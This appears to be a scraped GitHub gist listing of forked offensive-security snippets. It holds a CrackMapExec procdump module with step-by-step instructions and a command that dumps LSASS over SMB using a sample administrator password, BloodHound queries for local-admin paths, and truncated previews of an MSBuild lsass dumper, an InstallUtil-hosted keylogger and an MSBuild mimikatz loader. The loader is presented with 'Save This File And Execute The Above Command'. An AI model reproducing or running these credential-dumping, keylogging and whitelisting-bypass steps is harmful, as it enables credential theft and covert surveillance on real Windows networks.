- install pypykatz
pip install pypykatzoutisde your pipenv - Add this file to
cme/module/procdump.py - compile
python setup.py install - run
cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump
myst404
/ areadme.md
Created
November 17, 2019 18:41
— forked from mpgn/areadme.md
Procdump CME module that dump LSASS process and extract the result with pypykatz
myst404
/ FindingComputersWithLocalAdmin.md
Created
September 12, 2019 09:58
— forked from leechristensen/FindingComputersWithLocalAdmin.md
Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.
MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup
myst404
/ MSBuildProcDumper.csproj
Created
March 6, 2018 14:27
— forked from johnjohnsp1/MSBuildProcDumper.csproj
MSBuild - Process Dumper - lsass example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj --> | |
| <!-- Feel free to use a more aggressive class for testing. --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" |
myst404
/ InstallUtilMouseKeyLogger.cs
Created
March 6, 2018 14:21
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes mimikatz. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj --> | |
| <!-- Save This File And Execute The Above Command --> | |
| <!-- Author: Casey Smith, Twitter: @subTee --> | |
| <!-- License: BSD 3-Clause --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |